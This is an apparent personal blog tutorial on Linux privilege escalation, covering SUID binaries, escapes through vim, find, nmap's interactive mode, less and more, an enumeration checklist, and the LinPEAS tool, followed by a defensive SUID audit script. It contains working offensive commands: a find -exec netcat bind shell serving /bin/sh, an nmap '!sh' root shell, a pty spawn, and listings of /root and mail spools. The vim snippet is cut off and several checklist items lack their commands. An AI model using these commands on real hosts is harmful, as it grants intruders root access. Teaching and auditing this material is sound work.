This is my first blog about Linux privilege escalation. So without wasting any time, let's start. I'll start with the basics.
/* WHAT IS LINUX AND PRIVILEGE ESCALATION? */
1. Linux -: Linux is the best-known and most-used open-source operating system. As an operating system, Linux is the software that sits underneath all of the other software on a computer, receiving requests from those programs and relaying them to the computer's hardware.
2. PRIVILEGE ESCALATION -: Privilege escalation is a common way for attackers to gain unauthorized access to systems within a security perimeter.
Attackers start by finding weak points in an organization's defenses and gaining access to a system. In many cases the first point of penetration will not grant attackers the level of access or data they need. They will then attempt privilege escalation to gain more permissions or obtain access to additional, more sensitive systems.
/* WHY IS PRIVILEGE ESCALATION IMPORTANT? */
While usually not the main aim of an attacker, privilege escalation is frequently used in preparation for a more specific attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever you detect or suspect privilege escalation, you also need to look for signs of other malicious activity. However, even without evidence of further attacks, any privilege escalation incident is an information security issue in itself, because someone could have gained unauthorized access to personal, confidential, or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.
So far we have covered the theory. In short, privilege escalation means gaining root-level access from a non-root account.
Privilege Escalation through SUID.
SUID -: setuid and setgid are Unix access-rights flags that allow users to run an executable with the permissions of the file's owner or group rather than their own.
List of executables -:
How to find files with SUID set in Linux?
$ find . -perm /4000
You can add more options to this, such as -ls (long listing).
1. VIM -: Vim is a highly configurable text editor built to enable efficient text editing. It is an improved version of the vi editor distributed with most UNIX/Linux systems. If vim is running with the SUID bit set, it can access files owned by root.
You can access any file, and you can do many things, like spawning a shell,
like this -:
2. Press ESC key
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
For more, check out:
2. find -: find is used to locate files.
find ***** -exec whoami \;
find software_user -exec netcat -lvp 5555 -e /bin/sh \;
netcat 192.*.*.* 5555
3. nmap -: Older versions of Nmap (2.02 to 5.21) had an interactive mode, and through this interactive mode you can spawn a root shell.
- nmap -V (to find the version)
- nmap --interactive
- nmap> !sh
hehe yeah it was easy
4. bash -: On Linux, bash is the standard shell for common users.
With the SUID bit set, it can open a bash shell as root.
5. less -: less is a command that displays file contents.
Important: this will not always work; don't depend on less. I showed this on a Metasploitable VM.
6. more -: the more command is used to view text files.
The same logic as less applies here (more).
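As an added example (not part of the original post), here is a small POSIX sh audit that lists SUID files under a given root and flags the binaries discussed above, so an administrator can review them and strip the bit where it is not needed. The function names (audit_suid, count_flags) and the watchlist are my own assumptions.

```shell
#!/bin/sh
# Hypothetical helper: audit SUID files and flag the shell-spawning names this post covers.
WATCHLIST="vim vi find nmap bash sh less more"

is_watched() {
    # $1 = basename of a file; returns 0 when it is on the watchlist
    for w in $WATCHLIST; do
        [ "$1" = "$w" ] && return 0
    done
    return 1
}

audit_suid() {
    # $1 = directory to scan (defaults to /). Prints one line per SUID file:
    #   FLAG <owner> <mode> <path>  for watchlisted names
    #   INFO <owner> <mode> <path>  for everything else
    root=${1:-/}
    find "$root" -xdev -type f -perm /4000 2>/dev/null | while IFS= read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')
        mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f" 2>/dev/null || echo '?')
        if is_watched "${f##*/}"; then
            printf 'FLAG %s %s %s\n' "$owner" "$mode" "$f"
        else
            printf 'INFO %s %s %s\n' "$owner" "$mode" "$f"
        fi
    done
}

count_flags() {
    # Number of watchlisted SUID files under $1; a non-zero count deserves a review
    audit_suid "$1" | grep -c '^FLAG' || true
}
```

Run `audit_suid /` as a normal user and review every FLAG line; a SUID bit on those binaries is almost never required and can be removed with `chmod u-s`.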
Some important commands :)
1. What is the version?
2. Is it 64-bit or 32-bit?
3. Finding environment variables
4. Any printer connected to the machine?
5. Which services are running?
Shows the services that are running as root:
ps aux | grep root
ps -ef | grep root
6. Which applications are installed, which versions, and are they running or not?
ls -alh /usr/bin/
ls -alh /sbin/
7. Are any service settings misconfigured or vulnerable?
8. Are any services or jobs scheduled?
ls -al /etc/ | grep cron
ls -al /etc/cron*
9. Which NICs does the machine have?
10. Network configuration settings
11. Is tunnelling possible? Send commands locally or remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
12. Can sensitive files be found?
ls -alh /var/mail/
13. Finding logs
14. Shell spawn
python -c 'import pty;pty.spawn("/bin/bash")'
15. How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
17. Which tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
19. Anything "interesting" in the home directories (only if the directories are accessible)?
ls -ahlR /root/
ls -ahlR /home/
20. What's cached? IP and/or MAC addresses
/* We covered a lot of commands. Now I'm going to tell you about the most common tool used for privilege escalation. */
LINPEAS -: LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix hosts. I use it because it's very good for priv esc; always try LinPEAS if you have permission to read and execute it.
LinEnum is also a good tool,
but for me LinPEAS mostly works.
Thanks for reading, guys.